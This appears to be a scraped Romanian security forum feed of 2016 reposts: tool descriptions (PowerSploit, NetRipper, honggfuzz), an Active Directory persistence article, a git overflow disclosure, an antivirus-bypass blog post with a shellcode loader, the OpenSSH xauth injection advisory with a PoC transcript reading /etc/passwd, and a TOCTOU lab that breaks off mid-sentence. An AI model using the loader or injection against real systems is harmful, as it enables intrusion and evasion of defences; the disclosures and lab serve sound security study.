Nytro

OpenSSH <= 7.2p1 - xauth Injection https://vulners.com/exploitdb/EDB-ID:39569

require_once 'forum/init.php'; \IPS\Dispatcher\Build::i()->init(); $member = \IPS\Member::loggedIn(); Ce e gresit sau ce sa adaug ca sa fie setat acel cookie?

Rep.: Nu crezi ca vor exista repercursiuni din partea autoritatilor? E.G.: Ba da, la fel cum au existat si in cazul altor hackeri. Uite de exemplu, Team Code, compania lui e la 5 minute de mine. In 2013, am fost la el sa-i cer o slujba. Am vorbit cu el la telefon. Totul a fost ok pana i-am spus cine eram. Dupa aceea a inceput sa imi ceara exploit-uri zero-day (n.r. - un exploit folosit in ziua in care a fost descoperit) Team Code? @Stealth

Updated: https://github.com/NytroRST/NetRipper Changelog Version 1.0.1: Updated project to Visual Studio 2015 Added support for "dynamic" function signatures Updated support for Chrome (tested with Chrome 49) Thread-safe Win32 API hooking

Sneaky Active Directory Persistence #17: Group Policy by Sean Metcalf The content in this post describes a method through which an attacker could persist administrative access to Active Directory after having Domain Admin level rights for about 5 minutes. Complete list of Sneaky Active Directory Persistence Tricks posts This post explores how an attacker could leverage the built-in Active Directory management capability called Group Policy and how to mitigate potential security issues. Group Policy Overview One of the key benefits to Active Directory is its management capability and core to this capability is Group Policy. Group Policy has several parts to it and can be challenging to manage in a large enterprise without third-party tools. Group Policy enables administrators to manage computers and users in Active Directory. Group Policies are saved as Group Policy Objects (GPOs) which are then associated with Active Directory objects such as sites, domains, or organizational units (OUs). Group Policies can include security options, registry keys, software installation, and scripts for startup and shutdown and domain members refresh group policy settings every 90 minutes by default (5 minutes for Domain Controllers). This means that Group Policy enforces configured settings on the targeted computer. In most Active Directory implementations, there is at least one GPO configured on the domain defining mandated password, Kerberos, and domain-wide policies; at least one GPO configured for the Domain Controllers OU; and at least one GPO configured for a servers and workstations OU. These GPOs define security settings specific to the environment and often configure administrative groups, include startup/shutdown scripts, etc.. GPOs can be configured to set organization-defined security requirements at each level, and can be used for installing software and setting file and registry permissions. GPOs only apply to users and computers and can be filtered with groups or more specifically targeted using the Preferences component. The “No Override” option ensures that the settings in a Group Policy are applied even if a GPO closer to the resource has contradicting settings. There are two Group Policy components: 1. The “Group Policy Container” is stored in Active Directory (<DOMAIN>, System, Policies) 2. The files that actually contain the policy settings (collectively referred to as the “Group Policy Template“) are stored in SYSVOL. All domain Group Policies are stored in the following domain share: \\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\ Each Group Policy Object in Active Directory has the following attributes (on the policy object in AD): displayName: This is the name given to the GPO by the creator. gPCFileSysPath: This points to the location in SYSVOL where the associated GPO files (aka “Group Policy Template”) are located. gPCMachineExtensionNames: This attribute lists the GPO client side extensions (CSEs) required to by the client process the machine specific Group Policy settings. gPCUserExtensionNames: This attribute lists the GPO client side extensions (CSEs) required to by the client process the user specific Group Policy settings. Articol complet: https://adsecurity.org/?p=2716

PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts: CodeExecution Execute code on a target machine. Invoke-DllInjection Injects a Dll into the process ID of your choosing. Invoke-ReflectivePEInjection Reflectively loads a Windows PE file (DLL/EXE) in to the powershell process, or reflectively injects a DLL in to a remote process. Invoke-Shellcode Injects shellcode into the process ID of your choosing or within PowerShell locally. Invoke-WmiCommand Executes a PowerShell ScriptBlock on a target computer and returns its formatted output using WMI as a C2 channel. ScriptModification Modify and/or prepare scripts for execution on a compromised machine. Out-EncodedCommand Compresses, Base-64 encodes, and generates command-line output for a PowerShell payload script. Out-CompressedDll Compresses, Base-64 encodes, and outputs generated code to load a managed dll in memory. Out-EncryptedScript Encrypts text files/scripts. Remove-Comments Strips comments and extra whitespace from a script. Persistence Add persistence capabilities to a PowerShell script New-UserPersistenceOption Configure user-level persistence options for the Add-Persistence function. New-ElevatedPersistenceOption Configure elevated persistence options for the Add-Persistence function. Add-Persistence Add persistence capabilities to a script. Install-SSP Installs a security support provider (SSP) dll. Get-SecurityPackages Enumerates all loaded security packages (SSPs). AntivirusBypass AV doesn't stand a chance against PowerShell! Find-AVSignature Locates single Byte AV signatures utilizing the same method as DSplit from "class101". Exfiltration All your data belong to me! Invoke-TokenManipulation Lists available logon tokens. Creates processes with other users logon tokens, and impersonates logon tokens in the current thread. Invoke-CredentialInjection Create logons with clear-text credentials without triggering a suspicious Event ID 4648 (Explicit Credential Logon). Invoke-NinjaCopy Copies a file from an NTFS partitioned volume by reading the raw volume and parsing the NTFS structures. Invoke-Mimikatz Reflectively loads Mimikatz 2.0 in memory using PowerShell. Can be used to dump credentials without writing anything to disk. Can be used for any functionality provided with Mimikatz. Get-Keystrokes Logs keys pressed, time and the active window. Get-GPPPassword Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences. Get-TimedScreenshot A function that takes screenshots at a regular interval and saves them to a folder. New-VolumeShadowCopy Creates a new volume shadow copy. Get-VolumeShadowCopy Lists the device paths of all local volume shadow copies. Mount-VolumeShadowCopy Mounts a volume shadow copy. Remove-VolumeShadowCopy Deletes a volume shadow copy. Get-VaultCredential Displays Windows vault credential objects including cleartext web credentials. Out-Minidump Generates a full-memory minidump of a process. Mayhem Cause general mayhem with PowerShell. Set-MasterBootRecord Proof of concept code that overwrites the master boot record with the message of your choice. Set-CriticalProcess Causes your machine to blue screen upon exiting PowerShell. Privesc Tools to help with escalating privileges on a target. PowerUp Clearing house of common privilege escalation checks, along with some weaponization vectors. Recon Tools to aid in the reconnaissance phase of a penetration test. Invoke-Portscan Does a simple port scan using regular sockets, based (pretty) loosely on nmap. Get-HttpStatus Returns the HTTP Status Codes and full URL for specified paths when provided with a dictionary file. Invoke-ReverseDnsLookup Scans an IP address range for DNS PTR records. PowerView PowerView is series of functions that performs network and Windows domain enumeration and exploitation. Recon\Dictionaries A collection of dictionaries used to aid in the reconnaissance phase of a penetration test. Dictionaries were taken from the following sources. admin.txt - http://cirt.net/nikto2/ generic.txt - http://sourceforge.net/projects/yokoso/files/yokoso-0.1/ sharepoint.txt - http://www.stachliu.com/resources/tools/sharepoint-hacking-diggity-project/ License The PowerSploit project and all individual scripts are under the BSD 3-Clause license unless explicitly noted otherwise. Usage Refer to the comment-based help in each individual script for detailed usage information. To install this module, drop the entire PowerSploit folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable. The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules" The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules" To use the module, type Import-Module PowerSploit To see the commands imported, type Get-Command -Module PowerSploit If you're running PowerShell v3 and you want to remove the annoying 'Do you really want to run scripts downloaded from the Internet' warning, once you've placed PowerSploit into your module path, run the following one-liner:$Env:PSModulePath.Split(';') | % { if ( Test-Path (Join-Path $_ PowerSploit) ) {Get-ChildItem $_ -Recurse | Unblock-File} } For help on each individual command, Get-Help is your friend. Note: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability. Link: https://github.com/PowerShellMafia/PowerSploit

honggfuzz Description A general-purpose, easy-to-use fuzzer with interesting analysis options. See USAGE for more details Supports hardware-based feedback-driven fuzzing (requires Linux and a supported CPU model), also for closed-source binaries It works, at least, under GNU/Linux, FreeBSD, Mac OSX and Android Can fuzz long-lasting processes (e.g. network servers like Apache's httpd and ISC's bind) It's been used to find a few interesting security problems in major software; examples: FreeType 2 project: CVE-2010-2497, CVE-2010-2498, CVE-2010-2499, CVE-2010-2500, CVE-2010-2519, CVE-2010-2520, CVE-2010-2527 Multiple bugs in the libtiff library Multiple bugs in the librsvg library Multiple bugs in the poppler library Multiple exploitable bugs in IDA-Pro ... and more Link: https://github.com/google/honggfuzz

SSLyze Fast and full-featured SSL scanner for Python 2.7. Description SSLyze is a Python tool that can analyze the SSL configuration of a server by connecting to it. It is designed to be fast and comprehensive, and should help organizations and testers identify mis-configurations affecting their SSL servers. Key features include: Multi-processed and multi-threaded scanning: it's very fast. Support for all SSL protocols, from SSL 2.0 to TLS 1.2. NEW: SSLyze can also be used as a library, in order to run scans and process the results directly from Python. Performance testing: session resumption and TLS tickets support. Security testing: weak cipher suites, insecure renegotiation, CRIME, Heartbleed and more. Server certificate validation and revocation checking through OCSP stapling. Support for StartTLS handshakes on SMTP, XMPP, LDAP, POP, IMAP, RDP, PostGres and FTP. Support for client certificates when scanning servers that perform mutual authentication. Scan results can be written to an XML or JSON file for further processing. And much more ! Link: https://github.com/nabla-c0d3/sslyze

The complete guide to HTTP/2 with HAProxy and Nginx by Marcin Ryzycki on 14th March 2016 DEV-OPS With the recent buzz around HTTP/2 and its benefits, it is time to upgrade the infrastructure. This article shows how to install and configure HAProxy (with SSL termination) with Nginx. To ease the process even more, I supply you with ready to use Docker images. TL;DR Skip to Configuration section if you want to skip installation process and you are only interested in configuration details. Why should I care about HTTP/2? There are already many articles out there about HTTP/2 and its benefits - and I encourage you to read them. I'll focus on points which are most important from my point of view. Key benefits of HTTP/2: It is binary (not textual like HTTP/1.1) and uses header compression. No more worries about header and cookies size. Is fully multiplexed, can use one connection for parallelism. Your site performs much better in case it includes plenty of resources (fonts, CSS, JS, image files) because now they are all loaded in single TCP connection, in a non-blocking manner. Domain sharding and asset concatenation becomes an anti-pattern. In short: your website loads much faster. It allows the server to push responses proactively into client caches (no support for that feature in Nginx yet). It uses the new ALPN extension which allows for faster-encrypted connection. The encryption protocol is determined during initial connection. Articol complet: http://m12.io/blog/http-2-with-haproxy-and-nginx-guide

From: Laël Cellier <lael.cellier () laposte net> Date: Tue, 15 Mar 2016 15:55:37 +0100 Hello, original report describing the overflow is here http://pastebin.com/UX2P2jjg On 11/02/2016 16:50, Jeff King wrote this on the git security mailing list: On Thu, Feb 11, 2016 at 02:31:49PM +0100, 'Laël Cellier' via Git Security wrote: Ok the bug works by pushing or cloning a repository with a large filename or a large number of nested trees. [...] The point is affected versions are still shipped as part of many distributions as part of their stable branch, so I think it’s important to get a ᴄᴠᴇ for public awareness. Yes, I do think versions below v2.7.0 have a heap overflow, as you mentioned. But I don't think that is the only problem with path_name(), even in the current version. I'll repeat the code here (the version you posted was indented badly, and I had trouble reading it): -- >8 -- char *path_name(const struct name_path *path, const char *name) { const struct name_path *p; char *n, *m; int nlen = strlen(name); int len = nlen + 1; for (p = path; p; p = p->up) { if (p->elem_len) len += p->elem_len + 1; } n = xmalloc(len); m = n + len - (nlen + 1); memcpy(m, name, nlen + 1); for (p = path; p; p = p->up) { if (p->elem_len) { m -= p->elem_len + 1; memcpy(m, p->elem, p->elem_len); m[p->elem_len] = '/'; } } return n; } -- 8< -- The problem you describe is one where the size of the allocation does not match what strcpy would write. And that's kind-of fixed by moving to memcpy() in 34fa79a6, because at least now the initial value of "len" matches the number of bytes we write (so that number might be totally bogus, but we don't write more than we allocate). But "len" can also change after the fact, due to the loop. If you have a sequence of path components, each less than 2^31, they can sum to a much smaller positive value due to integer overflow (e.g., A/B/C with lengths A=2^31-5, B=2^31-5, C=20 would yield len=10). Then the buffer is too small to fit C, let alone all of the extra components we insert in the second loop. The fix I came up with for this is to convert all of the "int" variables here to "size_t". That doesn't actually _fix_ the problem at all, but does mean on a 64-bit system that you need a 2^64-long path to trigger it, which is impractical. But that doesn't help 32-bit systems (though in practice, I wouldn't be surprised if we barf long before that, as we would be unable to hold the "struct name_path" list in memory). Note that there is also a similar problem in tree-diff.c's path_appendnew(). There we build up the full pathname in a strbuf, which checks for overflow. But we then pass that length as an int and allocate a FLEX_ARRAY struct with it, which can end up too-small. This one is the more interesting of the two, I think, as it triggers via git-log, whereas the path_name() happens only during a repack (so it will hit you _eventually_, but probably not as soon as you've cloned). My solution there was similar: use size_t, which at least means you'd have to allocate petabytes on a 64-bit system to trigger it (much less on a 32-bit system, but _probably_ you'd be saved by malloc failing first). And that's why I dragged my feet on sending those fixes upstream; I don't think they're complete. The complete fix would be to use size_t consistently to store return values for strlen(), and to do integer overflow checks whenever we do computations on size_t. Those of you on this list may recall I posted a series for the latter last year, but it was somewhat invasive. It may be worth resurrecting. I think we could also get rid of path_name() entirely. The sole purpose at this point is to compute the name-hash for pack-objects, which could be done by walking the name_path list rather than re-constructing the whole thing in memory. -Peff Of course everything Peff talked about above is now fixed in git 2.7.1 with the removal of path_name() and the size_t/overflow check in tree-diff.c. It was even fixed earlier for users of github enterprise. However, several months after the last message on this thread, I’m not aware of any Linux distribution that issued a fix for their stable branch. Last week I could contact wikimedia so they could fix their gerrit‑gc server. Bitbucket, GitLab still suffer from that issue (they even use a git version before git/commit/34fa79a6cde56d6d428ab0d3160cb094ebad3305 which is the easiest one to trigger because of strcpy() instead of memcpy() ). while it seems normal the ᴄᴠᴇ details are still unpublished, I definitely can’t deal with every major provider. People surely remember https://www.google.fr/search?tbm=nws&q=cve-2014-9390 breaking the news about a similar issue in that software (which allowed most distros to fix it quikcly). It seems while this threat is more widespread, it definitely lacks advertisement. So some Peoples suggested me to post about it here. Sursa: http://seclists.org/oss-sec/2016/q1/645

Nu a citit nimeni sa vada ca este roman, ca apoi sa inceapa cu caterinca... http://news.softpedia.com/news/ghostshell-shares-his-thoughts-on-anonymous-malsec-the-feds-snitches-and-more-501769.shtml

Secrete C++ - Constantin Galatan O sa vezi cat de "avansat" esti...

Monday, March 14, 2016 Bypassing Antivirus With Ten Lines of Code or (Yet Again) Why Antivirus is Largely Useless I had originally set out to write a long winded blog post on different antivirus bypass techniques. I went through what was supposed to be step 1 of my guide and uploaded my resultant binary to virustotal. To my complete and utter shock, the binary got a 0/56 detection rate. I decided to throw out my long winded idea and move forward with this quick, dirty, and unbelievably easy method. I believe that most of my readers would agree with me that bypassing most antivirus based solutions is rather trivial, however I do occasionally bump in to some people who solely rely on tools that generate binaries that can easily be fingerprinted and flagged by antivirus solutions. This article is largely intended for that audience. Before I dive in to this small tidbit of C++ code, I'd like to touch on a tool that is really good at producing binaries that almost always evade detection, Veil-Evasion (part of theVeil-Framework). This tool is awesome (many thanks to @harmj0y and others for creating and contributing to this awesome project) and in almost all instances I have had to use it has not let me down. If it has, I blame people who keep generating binaries and then testing them on virustotal. If you people could stop doing that, that would be great. At any rate, this begs the question, if tools like Veil Evasion are so epic, why should you care about knowing how to slap togother a binary with a shellcode payload yourself? Well there are a number of reasons: People get busy and tools become deprecated The binaries generated by tools become fingerprintable; not the payload necessarily, but the compiled structure of the binary. As a penetration tester, you should really know how to do this. Ups your leet cred.. or so I hear. Before you take a look at the below code, it's worth noting that this is targeting the windows platform; as obviously noted with the reference to windows.h #include <windows.h> #include <iostream> int main(int argc, char **argv) { char b[] = {/* your XORd with key of 'x' shellcode goes here i.e. 0x4C,0x4F, 0x4C */}; char c[sizeof b]; for (int i = 0; i < sizeof b; i++) {c = b ^ 'x';} void *exec = VirtualAlloc(0, sizeof c, MEM_COMMIT, PAGE_EXECUTE_READWRITE); memcpy(exec, c, sizeof c); ((void(*)())exec)(); } Quite simply, the above code creates a character array with shell code you can add, performs an XOR operation with the incredibly sophisticated key of lowercase 'x', allocates some memory, copies the character array in said allocated memory, and executes it. It may be worth highlighting that you will need to XOR your shellcode with your key of choosing (in this case 'x') before you put it in the above code and compile. So you are probably looking at that and thinking 'really?' - I know how you feel. This is how I felt after I intended this to be step 1 of my tutorial and I ran it through virustotal and it returned 0/56 detection. I'd like to stress that this is an incredible simple and most basic technique, yet its success is still rather astonishing. I originally wrote this example and tested it on virus total a while ago, but I did reanalyze the executable on virustotal at the time of publishing this post and found it still had a 0 detection rate. The binary you generate will very likely not match the SHA256 of the binary I have tested; the binary I uploaded contained shellcode generated with the metasploit framework. Final Comments Alright, so antivirus is dead. We all know that. That being said, we can't argue that over 95% of organizations are still depending on antivirus to protect endpoints. Is there a better way? certainly. A number of vendors, which I shall not name, have launched products that take a new approach to protecting endpoints primarily focusing on identification of known exploit techniques. This is usually performed by way of injecting DLLs in to processes that will monitor for these known techniques and prevent the exploit from working successfully. Is this fool proof technique? I would be inclined to say no. The bar will be raised, but a new type of cat and mouse game will begin. Final note: The above may not work on _all_ antivirus solutions. I figure that was obvious, but thought I would mention it before the pitch forks come after me! Sursa: http://www.attactics.org/2016/03/bypassing-antivirus-with-10-lines-of.html

subsearch subsearch is a command line tool designed to brute force subdomain names. It is aimed at penetration testers and bug bounty hunters and has been built with a focus on speed, stealth and reporting. The current release is version 0.1.1 and was published on 14/3/2016. Features Scan a single hostname or a list of hostnames Takes as arguments a comma separated list of DNS resolvers, and/or a file containing newline delimited list of resolvers Check if the hostname's authoritative name servers are vulnerable to a zone transfer (can be skipped) Recursive scanning: If a CNAME, MX, NS or SRV record is discovered, the any subdomains will be added to a priority list of subdomains to scan for Extra level of verbosity Reporting capability Real-time feedback Supports the use of massive wordlists Sursa: https://github.com/gavia/subsearch

CVE-2016-3115 - OpenSSH <=7.2p1 xauth injection From: INTREST SEC <researchlab () intrest-sec com> Date: Mon, 14 Mar 2016 10:06:34 +0100 Author: <github.com/tintinweb> Ref: https://github.com/tintinweb/pub/tree/master/pocs/cve-2016-3115 Version: 0.2 Date: Mar 3rd, 2016 Tag: openssh xauth command injection may lead to forced-command and /bin/false bypass Overview -------- Name: openssh Vendor: OpenBSD References: * http://www.openssh.com/[1] Version: 7.2p1 [2] Latest Version: 7.2p1 Other Versions: <= 7.2p1 (all versions; dating back ~20 years) Platform(s): linux Technology: c Vuln Classes: CWE-93 - Improper Neutralization of CRLF Sequences ('CRLF Injection') Origin: remote Min. Privs.: post auth CVE: CVE-2016-3115 Description --------- quote website [1] OpenSSH is the premier connectivity tool for remote login with the SSH protocol. It encrypts all traffic to eliminate eavesdropping, connection hijacking, and other attacks. In addition, OpenSSH provides a large suite of secure tunneling capabilities, several authentication methods, and sophisticated configuration options. Summary ------- An authenticated user may inject arbitrary xauth commands by sending an x11 channel request that includes a newline character in the x11 cookie. The newline acts as a command separator to the xauth binary. This attack requires the server to have 'X11Forwarding yes' enabled. Disabling it, mitigates this vector. By injecting xauth commands one gains limited* read/write arbitrary files, information leakage or xauth-connect capabilities. These capabilities can be leveraged by an authenticated restricted user - e.g. one with the login shell configured as /bin/false or one with configured forced-commands - to bypass account restriction. This is generally not expected. The injected xauth commands are performed with the effective permissions of the logged in user as the sshd already dropped its privileges. Quick-Info: * requires: X11Forwarding yes * bypasses /bin/false and forced-commands ** OpenSSH does not treat /bin/false like /bin/nologin (in contrast to Dropbear) * does not bypass /bin/nologin (as there is special treatment for this) Capabilities (xauth): * Xauth * write file: limited chars, xauthdb format * read file: limit lines cut at first \s * infoleak: environment * connect to other devices (may allow port probing) PoC see ref github. Patch see ref github. Details ------- // see annotated code below * server_input_channel_req (serverloop.c) *- session_input_channel_req:2299 (session.c [2]) *- session_x11_req:2181 * do_exec_pty or do_exec_no_pty *- do_child *- do_rc_files (session.c:1335 [2]) Upon receiving an `x11-req` type channel request sshd parses the channel request parameters `auth_proto` and `auth_data` from the client ssh packet where `auth_proto` contains the x11 authentication method used (e.g. `MIT-MAGIC-COOKIE-1`) and `auth_data` contains the actual x11 auth cookie. This information is stored in a session specific datastore. When calling `execute` on that session, sshd will call `do_rc_files` which tries to figure out if this is an x11 call by evaluating if `auth_proto` and `auth_data` (and `display`) are set. If that is the case AND there is no system `/sshrc` existent on the server AND it no user-specific `$HOME/.ssh/rc` is set, then `do_rc_files` will run `xauth -q -` and pass commands via `stdin`. Note that `auth_data` nor `auth_proto` was sanitized or validated, it just contains user-tainted data. Since `xauth` commands are passed via `stdin` and `\n` is a command-separator to the `xauth` binary, this allows a client to inject arbitrary `xauth` commands. Sidenote #1: in case sshd takes the `$HOME/.ssh/rc` branch, it will pass the tainted input as arguments to that script. Sidenote #2: client code also seems to not sanitize `auth_data`, `auth_proto`. [3] This is an excerpt of the `man xauth` [4] to outline the capabilities of this xauth command injection: SYNOPSIS xauth [ -f authfile ] [ -vqibn ] [ command arg ... ] add displayname protocolname hexkey generate displayname protocolname [trusted|untrusted] [timeout seconds] [group group-id] [data hexdata] [n]extract filename displayname... [n]list [displayname...] [n]merge [filename...] remove displayname... source filename info exit quit version help ? Interesting commands are: info - leaks environment information / path ~# xauth info xauth: file /root/.Xauthority does not exist Authority file: /root/.Xauthority File new: yes File locked: no Number of entries: 0 Changes honored: yes Changes made: no Current input: (argv):1 source - arbitrary file read (cut on first `\s`) # xauth source /etc/shadow xauth: file /root/.Xauthority does not exist xauth: /etc/shadow:1: unknown command "smithj:Ep6mckrOLChF.:10063:0:99999:7:::" extract - arbitrary file write * limited characters * in xauth.db format * since it is not compressed it can be combined with `xauth add` to first store data in the database and then export it to an arbitrary location e.g. to plant a shell or do other things. generate - connect to <ip>:<port> (port probing, connect back and pot. exploit vulnerabilities in X.org Source ------ Inline annotations are prefixed with `//#!` /* * Run $HOME/.ssh/rc, /etc/ssh/sshrc, or xauth (whichever is found * first in this order). */ static void do_rc_files(Session *s, const char *shell) { ... snprintf(cmd, sizeof cmd, "%s -q -", options.xauth_location); f = popen(cmd, "w"); //#! run xauth -q - if (f) { fprintf(f, "remove %s\n", //#! remove <user_tainted_data> - injecting \n auth_display injects xauth command s->auth_display); fprintf(f, "add %s %s %s\n", //#! \n injection s->auth_display, s->auth_proto, s->auth_data); pclose(f); } else { fprintf(stderr, "Could not run %s\n", cmd); } } } Proof of Concept ---------------- Prerequisites: * install python 2.7.x * issue `#> pip install paramiko` to install `paramiko` ssh library for python 2.x * make sure `poc.py` Usage: <host> <port> <username> <password or path_to_privkey> path_to_privkey - path to private key in pem format, or '.demoprivkey' to use demo private key poc: 1. configure one user (user1) for `force-commands` and another one with `/bin/false` in `/etc/passwd`: #PUBKEY line - force commands: only allow "whoami" #cat /home/user1/.ssh/authorized_keys command="whoami" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1RpYKrvPkIzvAYfX/ZeU1UzLuCVWBgJUeN/wFRmj4XKl0Pr31I+7ToJnd7S9JTHkrGVDu+BToK0f2dCWLnegzLbblr9FQYSif9rHNW3BOkydUuqc8sRSf3M9oKPDCmD8GuGvn40dzdub+78seYqsSDoiPJaywTXp7G6EDcb9N55341o3MpHeNUuuZeiFz12nnuNgE8tknk1KiOx3bsuN1aer8+iTHC+RA6s4+SFOd77sZG2xTrydblr32MxJvhumCqxSwhjQgiwpzWd/NTGie9xeaH5EBIh98sLMDQ51DIntSs+FMvDx1U4rZ73OwliU5hQDobeufOr2w2ap7td15 user1@box #cat /etc/passwd user2:x:1001:1002:,,,:/home/user2:/bin/false 2. run sshd with `X11Forwarding yes` (kali default config) #> /root/openssh-7.2p1/sshd -p 22 -f sshd_config -D -d 3. `forced-commands` - connect with user1 and display env information #> python <host> 22 user1 .demoprivkey INFO:__main__:add this line to your authorized_keys file: #PUBKEY line - force commands: only allow "whoami" #cat /home/user/.ssh/authorized_keys command="whoami" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1RpYKrvPkIzvAYfX/ZeU1UzLuCVWBgJUeN/wFRmj4XKl0Pr31I+7ToJnd7S9JTHkrGVDu+BToK0f2dCWLnegzLbblr9FQYSif9rHNW3BOkydUuqc8sRSf3M9oKPDCmD8GuGvn40dzdub+78seYqsSDoiPJaywTXp7G6EDcb9N55341o3MpHeNUuuZeiFz12nnuNgE8tknk1KiOx3bsuN1aer8+iTHC+RA6s4+SFOd77sZG2xTrydblr32MxJvhumCqxSwhjQgiwpzWd/NTGie9xeaH5EBIh98sLMDQ51DIntSs+FMvDx1U4rZ73OwliU5hQDobeufOr2w2ap7td15 user@box INFO:__main__:connecting to: user1:<PKEY>@host:22 INFO:__main__:connected! INFO:__main__: Available commands: .info .readfile <path> .writefile <path> <data> .exit .quit <any xauth command or type help> #> .info DEBUG:__main__:auth_cookie: '\ninfo' DEBUG:__main__:dummy exec returned: None INFO:__main__:Authority file: /home/user1/.Xauthority File new: no File locked: no Number of entries: 1 Changes honored: yes Changes made: no Current input: (stdin):3 /usr/bin/xauth: (stdin):2: bad "add" command line ... 4. `forced-commands` - read `/etc/passwd` ... #> .readfile /etc/passwd DEBUG:__main__:auth_cookie: 'xxxx\nsource /etc/passwd\n' DEBUG:__main__:dummy exec returned: None INFO:__main__:root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync ... 5. `forced-commands` - write `/tmp/testfile` #> .writefile /tmp/testfile `thisisatestfile` DEBUG:__main__:auth_cookie: '\nadd 127.0.0.250:65500 `thisisatestfile` aa' DEBUG:__main__:dummy exec returned: None DEBUG:__main__:auth_cookie: '\nextract /tmp/testfile 127.0.0.250:65500' DEBUG:__main__:dummy exec returned: None DEBUG:__main__:/usr/bin/xauth: (stdin):2: bad "add" command line #> ls -lsat /tmp/testfile 4 -rw------- 1 user1 user1 59 xx xx 13:49 /tmp/testfile #> cat /tmp/testfile \FA65500hi\FA65500`thisisatestfile`\AA 6. `/bin/false` - connect and read `/etc/passwd` #> python <host> 22 user2 user2password INFO:__main__:connecting to: user2:user2password@host:22 INFO:__main__:connected! INFO:__main__: Available commands: .info .readfile <path> .writefile <path> <data> .exit .quit <any xauth command or type help> #> .readfile /etc/passwd DEBUG:__main__:auth_cookie: 'xxxx\nsource /etc/passwd\n' DEBUG:__main__:dummy exec returned: None INFO:__main__:root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin ... user2:x:1001:1002:,,,:/home/user2:/bin/false ... 7. `/bin/false` - initiate outbound X connection to 8.8.8.8:6100 #> generate 8.8.8.8:100 . #> tcpdump IP <host>.42033 > 8.8.8.8.6100: Flags [S], seq 1026029124, win 29200, options [mss 1460,sackOK,TS val 431416709 ecr 0,nop,wscale 10], length 0 Mitigation / Workaround ------------------------ * disable x11-forwarding: `sshd_config` set `X11Forwarding no` * disable x11-forwarding for specific user with forced-commands: `no-x11-forwarding` in `authorized_keys` Notes ----- Verified, resolved and released within a few days. very impressive. Vendor response: see advisory [5] References ---------- [1] http://www.openssh.com/ [2] https://github.com/openssh/openssh-portable/blob/5a0fcb77287342e2fc2ba1cee79b6af108973dc2/session.c#L1388 [3] https://github.com/openssh/openssh-portable/blob/19bcf2ea2d17413f2d9730dd2a19575ff86b9b6a/clientloop.c#L376 [4] http://linux.die.net/man/1/xauth [5] http://www.openssh.com/txt/x11fwd.adv Sursa: http://seclists.org/fulldisclosure/2016/Mar/46

Vin cu ceva mai important in 4.6: http://www.phoronix.com/scan.php?page=news_item&px=Linux-4.6-MM-32-bit-ASLR "Most notable to the mm pull request is the enabling of full ASLR randomization for 32-bit programs. Yes, about Address Space Layout Randomization. If you're not familiar with it, see Wikipedia. "

E mail-ul de la Linus, toata lumea stie engleza, link-ul e la final.

E facut doar partea de desing, partea de backend si integrare cu IPBoard nu e facuta. Eu am facut pentru index-ul existent, ar trebui sa fie ok, mie imi merge, nu stiu de ce apar probleme

Social-Network-Harvester-v1.0 How to install the SNH on Ubuntu server v.14.04.4: Install the prerequisites: sudo apt-get update sudo apt-get upgrade sudo apt-get install python3-dev libmysqlclient-dev sudo apt-get install python-pip Create a virtual environnement for python sudo virtualenv py3env -p python3 source py3env/bin/activate Install python3 modules: pip install mysqlclient pip install django run the server in dev-mode: cd Social-Network-Harvester-v1.0/Social-Network-Harvester-v1.0 python manage.py runserver Sursa: https://github.com/unclesaam/Social-Network-Harvester-v1.0

Race Condition (TOCTOU) Vulnerability Lab Lab Overview A race condition occurs when two threads access a shared variable at the same time. The first thread reads the variable, and the second thread reads the same value from the variable. Then the first thread and second thread perform their operations on the value, and they race to see which thread can write the value last to the shared variable. The value of the thread that writes its value last is preserved, because the thread is writing over the value that the previous thread wrote. The outcome of the execution depends on the particular order in which the access takes place. If a privileged program has a race-condition vulnerability, attackers can run a parallel process to “race” against the privileged program, with an intention to change the behaviors of the program. In this lab, you will be given a program with a race-condition (TOCTOU) vulnerability; your task is to exploit the vulnerability and gain the root privilege. Lab Tasks Set the environment Create a normal user on Kali Linux Normally with a fresh installation of Kali Linux, we use the “root” account by default, so we should create a normal user account, the student should follow the below steps to create a normal user account: Open the terminal Use the following command to create a new user # adduser <username> Then log out from this root user session Login with the created new user account A vulnerable Program The following C program is our vulnerable program, which contains Time To Check -Time To Use (TOC TOU) vulnerability /* vulnerable-program.c */ #include <stdio.h> #include<unistd.h> #include <string.h>#define DELAY 50000 int main(int argc, char * argv[]) { char * fileName = argv[1]; char buffer[60]; int i; FILE * fileHandler; /* get user input */ scanf(“%50s”, buffer ); if(!access(fileName, W_OK)) { /*Simulating the Delay*/ for(i = 0; i < DELAY;i++) { int a = i ^ 2; } fileHandler = fopen(fileName, “a+”); fwrite(“\n”, sizeof(char), 1, fileHandler); fwrite(buffer, sizeof(char), strlen(buffer), fileHandler); fwrite(“\n”, sizeof(char), 1, fileHandler); fclose(fileHandler); } else { printf(“No permission \n”); } } This program appends a string of user input to the end of a file. The program takes the file name as a command-line argument. This program must be owned by the “root” user, and the program should be a Set-UID program which means that we must set the Set-UID bit to the executable. Since the program is part of a Set-UID program, the program will run with the root privilege. The purpose of calling “access()” system call is to check whether the real user has the “access” permission to the file (provided by the user as a command line argument). Once the program has made sure that the real user indeed has the right, the program opens the file and writes the user input into the file. The program is vulnerable to a race condition because of the time window between the check which represents in calling “access()” system call and the use which represents in calling “fopen()” system call, and we simulating, this time, window by delaying the execution using the for statement. Vulnerable program Compilation In this step, the student will learn how to compile the vulnerable program, by following the following steps: Copy the vulnerable code in a file and name it as “vulnerable-program.c” Open the terminal Change the user to the root user, using the following command $su root Use Clang compiler to compile the code. #clang 